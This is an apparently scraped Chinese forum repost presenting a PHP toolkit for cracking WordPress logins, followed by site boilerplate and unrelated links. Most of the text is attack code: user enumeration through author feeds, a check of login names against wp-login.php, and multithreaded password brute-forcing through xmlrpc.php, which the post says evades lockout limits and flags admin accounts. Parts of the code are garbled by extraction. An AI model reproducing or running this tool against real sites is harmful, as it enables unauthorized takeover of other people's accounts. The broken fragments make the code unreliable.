php scan.php http://www.target.com ? 2:多線程(異步) 同時進(jìn)行 破完一個用戶成功立即退出該任務(wù) 接著破另外一個用戶 3:自動生成用戶名相關(guān)并加到字典頭部 大大的提高破解速度 4:模塊可單獨使用 5:枚舉用戶模塊 能抓取大部分常規(guī) wor" />

RM新时代网站-首页

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

如何破解wordpress

jf_hKIAo4na ? 來源:菜鳥學(xué)安全 ? 2023-05-30 09:04 ? 次閱讀

web破解 一般喜歡用 burpsuite 、hydra 通用性好但 一大堆參數(shù)使用是還需配置
破解wordpress 用wpscan 不得不說是很好用 功能多 而且經(jīng)常更新但 不是每次跑wordpress 都開linux (ruby 各種蛋疼)

1: 使用非常簡單 無需其它參數(shù)

shell>php scan.php http://www.target.com

2:多線程(異步) 同時進(jìn)行
破完一個用戶成功立即退出該任務(wù) 接著破另外一個用戶

3:自動生成用戶名相關(guān)并加到字典頭部
大大的提高破解速度

4:模塊可單獨使用

5:枚舉用戶模塊 能抓取大部分常規(guī) wordpress站點用戶
檢查枚舉到的用戶是否為登陸用戶 如果不是則剔除 大大的提高破解效率

6:該腳本 需curl 擴(kuò)展支持

7:利用wordpress 的xmlrpc.php 文件破解
可繞過限制 并判斷是否為管理員用戶

8、環(huán)境簡單
僅需 php.exe 、php5ts.dll 、curl.dll

文件說明:

init.php 配置及功能函數(shù)
enum_user.php 根據(jù)頁面枚舉用戶
chkuser.php 檢測枚舉到的用戶是否為可登陸用戶
RollingCurl.php 多線程http請求類 (修改版)
BruteWordPress.php 爆破類
scan.php 主文件(要運行的文件)
pass.list 高頻率弱口令

init.php

enum_user.php

nv = 0;
$this->rc = new RollingCurl();
$this->rc->callback = $this->create_request_callback($this->rc);
$this->rc->__set('window_size', Thread);
$this->rc->__set('time_out', TimeOut);
    }
function create_request_callback($rc) {
return function ($response, $info, $request) use ($rc) {
            $pattern = '/(author/(.*)/feed|names) . ' users' . PHP_EOL;
    }
function result() {
return $this->names;
    }
}
?>

chkuser.php

rc = new RollingCurl();
$this->rc->callback = $this->create_request_callback($this->rc);
$this->rc->__set('window_size', Thread);
$this->rc->__set('time_out', TimeOut);
    }
function create_request_callback($rc) {
return function ($response, $info, $request) use ($rc) {
if ($info['http_code'] == 404 || $info['http_code'] == 403 || $info['http_code'] == 500) {
echo '[-] Access error!' . PHP_EOL;
$this->rc->cancelRequests();
            }
            preg_match('#log=(.+)&pwd=#', $request->post_data, $out);
            $user = $out[1];
if (stristr($response, "" . $user . "")) {
$this->names[] = $user;
            }
if (stristr($response, 'Too many failed login attempts')) {
$this->rc->cancelRequests();
            }
        };
    }
function run() {
include_once 'enum_user.php';
        $collector = new EnumUser();
        $collector->run();
        $users = $collector->result();
        printf("[+] %s Chkusers Loginname...
", date('hs', time()));
foreach ($users as $user) {
            $url = domain . '/wp-login.php';
            $post_data = "log={$user}&pwd=UjP8XnFD4n3LzIjlax";
            $request = new RollingCurlRequest($url, 'POST', $post_data);
            $request->options = array(CURLOPT_USERAGENT => USERAGENT);
$this->rc->add($request);
        }
$this->rc->execute();
        $counts = count($this->names);
if ($counts == 0) {
echo '[-] Warning Unable Check Loginuser!' . PHP_EOL;
$this->names = $users;
            $counts = count($this->names);
        }
echo 'login users:' . PHP_EOL;
foreach ($this->names as $key => $u) {
echo "	" .iconv("UTF-8","GB18030//IGNORE",$u) . PHP_EOL;
        }
        printf("[+] %s Finded %d loginnames ... 
", date('hs', time()), $counts);
    }
function result() {
return $this->names;
    }
}
?>

RollingCurl.php

url = $url;
$this->method = $method;
$this->post_data = $post_data;
$this->headers = $headers;
$this->options = $options;
    }
/**
     * @return void
     */
public function __destruct() {
unset($this->url, $this->method, $this->post_data, $this->headers, $this->options);
    }
}
/**
 * RollingCurl custom exception
 */
class RollingCurlException extends Exception
{
}
/**
 * Class that holds a rolling queue of curl requests.
 *
 * @throws RollingCurlException
 */
class RollingCurl
{
/**
     * @var int
     *
     * Window size is the max number of simultaneous connections allowed.
     *
     * REMEMBER TO RESPECT THE SERVERS:
     * Sending too many requests at one time can easily be perceived
     * as a DOS attack. Increase this window_size if you are making requests
     * to multiple servers or have permission from the receving server admins.
     */
private $window_size = 5;
/**
     * @var float
     *
     * Timeout is the timeout used for curl_multi_select.
     */
private $timeout = 10;
/**
     * @var string|array
     *
     * Callback function to be applied to each result.
     */
public $callback;
public $master = null;
public $requestList = array();
/**
     * @var array
     *
     * Set your base options that you want to be used with EVERY request.
     */
protected $options = array(CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30);
/**
     * @var array
     */
private $headers = array();
/**
     * @var Request[]
     *
     * The request queue
     */
private $requests = array();
/**
     * @var RequestMap[]
     *
     * Maps handles to request indexes
     */
private $requestMap = array();
/**
     * @param  $callback
     * Callback function to be applied to each result.
     *
     * Can be specified as 'my_callback_function'
     * or array($object, 'my_callback_method').
     *
     * Function should take three parameters: $response, $info, $request.
     * $response is response body, $info is additional curl info.
     * $request is the original request
     *
     * @return void
     */
function __construct($callback = null) {
$this->callback = $callback;
    }
/**
     * @param string $name
     * @return mixed
     */
public function __get($name) {
return (isset($this->{$name})) ? $this->{$name} : null;
    }
/**
     * @param string $name
     * @param mixed $value
     * @return bool
     */
public function __set($name, $value) {
// append the base options & headers
if ($name == "options" || $name == "headers") {
$this->{$name} = $value + $this->{$name};
        } else {
$this->{$name} = $value;
        }
return true;
    }
/**
     * Add a request to the request queue
     *
     * @param Request $request
     * @return bool
     */
public function add($request) {
$this->requests[] = $request;
return true;
    }
public function cancelRequests($all = true) {
$this->requests = array();
if ($all) {
foreach ($this->requestList as $handler) {
                curl_multi_remove_handle($this->master, $handler);
            }
        }
return true;
    }
/**
     * Create new Request and add it to the request queue
     *
     * @param string $url
     * @param string $method
     * @param  $post_data
     * @param  $headers
     * @param  $options
     * @return bool
     */
public function request($url, $method = "GET", $post_data = null, $headers = null, $options = null) {
$this->requests[] = new RollingCurlRequest($url, $method, $post_data, $headers, $options);
return true;
    }
/**
     * Perform GET request
     *
     * @param string $url
     * @param  $headers
     * @param  $options
     * @return bool
     */
public function get($url, $headers = null, $options = null) {
return $this->request($url, "GET", null, $headers, $options);
    }
/**
     * Perform POST request
     *
     * @param string $url
     * @param  $post_data
     * @param  $headers
     * @param  $options
     * @return bool
     */
public function post($url, $post_data = null, $headers = null, $options = null) {
return $this->request($url, "POST", $post_data, $headers, $options);
    }
/**
     * Execute processing
     *
     * @param int $window_size Max number of simultaneous connections
     * @return string|bool
     */
public function execute($window_size = null) {
// rolling curl window must always be greater than 1
if (sizeof($this->requests) == 1) {
return $this->single_curl();
        } else {
// start the rolling curl. window_size is the max number of simultaneous connections
return $this->rolling_curl($window_size);
        }
    }
/**
     * Performs a single curl request
     *
     * @access private
     * @return string
     */
private function single_curl() {
        $ch = curl_init();
        $request = array_shift($this->requests);
        $options = $this->get_options($request);
        curl_setopt_array($ch, $options);
        $output = curl_exec($ch);
        $info = curl_getinfo($ch);
// it's not neccesary to set a callback for one-off requests
if ($this->callback) {
            $callback = $this->callback;
if (is_callable($this->callback)) {
                call_user_func($callback, $output, $info, $request);
            }
        } else return $output;
return true;
    }
/**
     * Performs multiple curl requests
     *
     * @access private
     * @throws RollingCurlException
     * @param int $window_size Max number of simultaneous connections
     * @return bool
     */
private function rolling_curl($window_size = null) {
if ($window_size) $this->window_size = $window_size;
// make sure the rolling window isn't greater than the # of urls
if (sizeof($this->requests) < $this->window_size) $this->window_size = sizeof($this->requests);
if ($this->window_size < 2) {
throw new RollingCurlException("Window size must be greater than 1");
        }
$this->master = curl_multi_init();
// start the first batch of requests
for ($i = 0; $i < $this->window_size; $i++) {
            $ch = curl_init();
            $options = $this->get_options($this->requests[$i]);
            curl_setopt_array($ch, $options);
            curl_multi_add_handle($this->master, $ch);
            array_push($this->requestList, $ch);
// Add to our request Maps
            $key = (string)$ch;
$this->requestMap[$key] = $i;
        }
do {
while (($execrun = curl_multi_exec($this->master, $running)) == CURLM_CALL_MULTI_PERFORM);
if ($execrun != CURLM_OK) break;
// a request was just completed -- find out which one
while ($done = curl_multi_info_read($this->master)) {
// get the info and content returned on the request
                $info = curl_getinfo($done['handle']);
                $output = curl_multi_getcontent($done['handle']);
// send the return values to the callback function.
                $callback = $this->callback;
if (is_callable($callback)) {
                    $key = (string)$done['handle'];
                    $request = $this->requests[$this->requestMap[$key]];
unset($this->requestMap[$key]);
                    call_user_func($callback, $output, $info, $request);
                }
// start a new request (it's important to do this before removing the old one)
if ($i < sizeof($this->requests) && isset($this->requests[$i]) && $i < count($this->requests)) {
                    $ch = curl_init();
                    $options = $this->get_options($this->requests[$i]);
                    curl_setopt_array($ch, $options);
                    curl_multi_add_handle($this->master, $ch);
                    array_push($this->requestList, $ch);
// Add to our request Maps
                    $key = (string)$ch;
$this->requestMap[$key] = $i;
                    $i++;
                }
// remove the curl handle that just completed
                curl_multi_remove_handle($this->master, $done['handle']);
            }
// Block for data in / output; error handling is done by curl_multi_exec
if ($running) curl_multi_select($this->master, $this->timeout);
        }
while ($running);
        curl_multi_close($this->master);
return true;
    }
/**
     * Helper function to set up a new request by setting the appropriate options
     *
     * @access private
     * @param Request $request
     * @return array
     */
private function get_options($request) {
// options for this entire curl object
        $options = $this->__get('options');
if (ini_get('safe_mode') == 'Off' || !ini_get('safe_mode')) {
            $options[CURLOPT_FOLLOWLOCATION] = 1;
            $options[CURLOPT_MAXREDIRS] = 5;
        }
        $headers = $this->__get('headers');
// append custom options for this specific request
if ($request->options) {
            $options = $request->options + $options;
        }
// set the request URL
        $options[CURLOPT_URL] = $request->url;
// posting data w/ this request?
if ($request->post_data) {
            $options[CURLOPT_POST] = 1;
            $options[CURLOPT_POSTFIELDS] = $request->post_data;
        }
if ($headers) {
            $options[CURLOPT_HEADER] = 0;
            $options[CURLOPT_HTTPHEADER] = $headers;
        }
return $options;
    }
/**
     * @return void
     */
public function __destruct() {
unset($this->window_size, $this->callback, $this->options, $this->headers, $this->requests);
    }
}

BruteWordPress.php

rc = new RollingCurl();
$this->rc->callback = $this->create_request_callback($this->rc);
$this->rc->__set('window_size', Thread);
$this->rc->__set('time_out', TimeOut);
    }
function create_request_callback($rc) {
return function ($response, $info, $request) use ($rc) {
if ($info['http_code'] == 404 || $info['http_code'] == 403 || $info['http_code'] == 500) {
echo '[-] Access error!' . PHP_EOL;
$this->rc->cancelRequests();
            }
            $p = $request->post_data;
            preg_match_all('/([^s]+?)/', $p, $m);
            $user = $m[1][0];
            $pass = $m[1][1];
if (!preg_match('/(d)/', $response, $is_admin)) {
//echo '[*] Brote user ' . $user . " ..." . "
";
            } else {
//print_r($is_admin).PHP_EOL;
if ($is_admin[1] == 1) {
echo '[+] Bruteed~ -> ' . iconv("UTF-8","GB18030//IGNORE",$user)  . ':' . $pass . ' [is admin]' . PHP_EOL;
$this->rc->cancelRequests();
                } else {
echo '[+] Bruteed~ -> ' . iconv("UTF-8","GB18030//IGNORE",$user)  . ':' . $pass . PHP_EOL;
$this->rc->cancelRequests();
                }
            }
        };
    }
function run() {
        $pass_file = preg_replace('/s$/', "", file(wordlist));
        $user_pre = array('123', '111', '1', 'a', 'pass', '!@#', 'password', 'abc', '1961', '1962', '1963', '1970', '1988', '1989', '1990', '1991', '1992', '1993', '1994', '1995', '1996', '1997', '1998', '1999', '2001', '2002', '2003', '2004', '2006', '2005', '2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015');
foreach ($user_pre as $pre) {
            $pre_u[] = user . $pre;
        }
        $p = array_merge($pre_u, $pass_file);
        $passwords = array_unique($p);
        array_unshift($passwords, user);
foreach ($passwords as $pass) {
            $url = domain . '/xmlrpc.php';
            $post_data = sprintf('wp.getUsersBlogs%s%s', user, $pass);
            $request = new RollingCurlRequest($url, 'POST', $post_data);
            $request->options = array(CURLOPT_USERAGENT => USERAGENT);
$this->rc->add($request);
        }
$this->rc->execute();
    }
}
$brute = new BruteWordPress();
$brute->run();
?>

scan.php

run();
$user_arr = $chk->result();
//print_r($user_arr);
function broter($user) {
    system('php BruteWordPress.php ' . target . ' ' . $user);
}
printf("[+] %s Broting...
", date('hs', time()));
foreach ($user_arr as $user) {
echo '[*] Brute user ' . iconv("UTF-8","GB18030//IGNORE",$user). " ..." . str_repeat(' ', 60) . "
";
    broter($user);
}
show_time();
?>
審核編輯:彭靜
聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 配置
    +關(guān)注

    關(guān)注

    1

    文章

    188

    瀏覽量

    18375
  • 腳本
    +關(guān)注

    關(guān)注

    1

    文章

    389

    瀏覽量

    14858
  • wordpress
    +關(guān)注

    關(guān)注

    0

    文章

    34

    瀏覽量

    2876

原文標(biāo)題:wordpress 用戶枚舉,爆破工具

文章出處:【微信號:菜鳥學(xué)安全,微信公眾號:菜鳥學(xué)安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關(guān)推薦

    使用Helm 在容器服務(wù)k8s集群一鍵部署wordpress

    的kubernets集群默認(rèn)集成了helm并初始化提供了一些常用charts,下面我們就以安裝wordpress示例來演示使用流程。以上為容器服務(wù)默認(rèn)提供的一些安裝charts,下面我們來安裝wordpress
    發(fā)表于 03-29 13:38

    使用docker搭建wordpress網(wǎng)站的目標(biāo)主要有以下幾個

    使用docker搭建wordpress網(wǎng)站
    發(fā)表于 07-24 11:38

    請教大神怎樣去搭建一種WordPress站點呢

    請教大神怎樣去搭建一種WordPress站點呢?
    發(fā)表于 12-24 06:38

    如何開啟WordPress調(diào)試模式(報錯提示)?

    對于經(jīng)常折騰 WordPress 的博主而言,開啟 WordPress 調(diào)試模式(報錯提示)是非常有必要的,而且這個也是 WordPress 開發(fā)者必備的技能之一,但是對于剛接觸 WordPr
    發(fā)表于 10-31 18:20

    wordpress中文簡體壓縮包

    wordpress中文簡體壓縮包,4.4最新版本,內(nèi)置3套模版,上傳即用
    發(fā)表于 01-11 16:22 ?0次下載

    怎樣在自己的服務(wù)器上安裝Wordpress

    FileZilla上傳完所有文件后,在Web瀏覽器上轉(zhuǎn)到http://yourweb.host/wordpress/并按照步驟進(jìn)行操作。
    的頭像 發(fā)表于 12-11 16:40 ?3134次閱讀
    怎樣在自己的服務(wù)器上安裝<b class='flag-5'>Wordpress</b>

    如何在樹莓派上托管WordPress網(wǎng)站

    如果所有這些都讓人不知所措,我們就不會怪你。因此,我們建議使用WP Engine托管零麻煩的WordPress網(wǎng)站。他們管理所有管理問題,因此您可以專注于您的內(nèi)容。
    的頭像 發(fā)表于 01-30 17:55 ?2291次閱讀
    如何在樹莓派上托管<b class='flag-5'>WordPress</b>網(wǎng)站

    vps搭建wordpress網(wǎng)站的3個步驟介紹

    如果你想要搭建一個自己的WordPress網(wǎng)站,就算大部分不懂技術(shù)的小白也可以使用vps搭建wordpress網(wǎng)站。使用vps主機(jī)搭建一個完全自托管的網(wǎng)站并不是想象中的那么難,因為你
    的頭像 發(fā)表于 07-07 17:04 ?3454次閱讀

    Sync QCloud COS WordPress云存儲插件

    ./oschina_soft/gitee-wordpress-qcloud-cos.zip
    發(fā)表于 05-18 14:43 ?0次下載
    Sync QCloud COS <b class='flag-5'>WordPress</b>云存儲插件

    Wordpress On BAE針對百度云BAE修改的WordPress中文版

    ./oschina_soft/WordPress-on-BAE.zip
    發(fā)表于 06-09 10:05 ?0次下載
    <b class='flag-5'>Wordpress</b> On BAE針對百度云BAE修改的<b class='flag-5'>WordPress</b>中文版

    WordPress博客平臺

    ./oschina_soft/WordPress.zip
    發(fā)表于 06-10 14:21 ?1次下載
    <b class='flag-5'>WordPress</b>博客平臺

    WordPress正在測試對SQLite的支持

    ? WordPress 近日合并了集成 SQLite 模塊的 PR,以測試在 WordPress 中實現(xiàn)對 SQLite 的正式支持。 據(jù)介紹,此 PR 的代碼復(fù)制自 https
    的頭像 發(fā)表于 12-20 13:45 ?499次閱讀

    恒訊科技介紹:虛擬主機(jī)托管WordPress的常見問答

    在本文中,小編將給大家介紹一下虛擬主機(jī)托管WordPress的常見問答,希望能幫助到大家參考! 一、虛擬主機(jī)托管WordPress安全嗎? 虛擬主機(jī)托管WordPress的安全性取決于所選虛擬主機(jī)
    的頭像 發(fā)表于 07-10 17:31 ?504次閱讀

    使用Docker安裝WordPress教程

    本教程將向您展示如何使用 Docker Compose 在 Docker 容器中運行 WordPress 安裝。
    的頭像 發(fā)表于 07-28 11:39 ?1535次閱讀
    使用Docker安裝<b class='flag-5'>WordPress</b>教程

    如何三步實現(xiàn)高性能 WordPress 網(wǎng)站的部署

    WordPress 是一個企業(yè)級開源的內(nèi)容管理系統(tǒng),常用于企業(yè)建站、跨境電商及個人博客?的搭建。本文介紹如何使用 WordPress 快速搭建網(wǎng)站。 如果你想使用 WordPress 搭建網(wǎng)站,你
    的頭像 發(fā)表于 08-22 21:36 ?654次閱讀
    如何三步實現(xiàn)高性能 <b class='flag-5'>WordPress</b> 網(wǎng)站的部署
    RM新时代网站-首页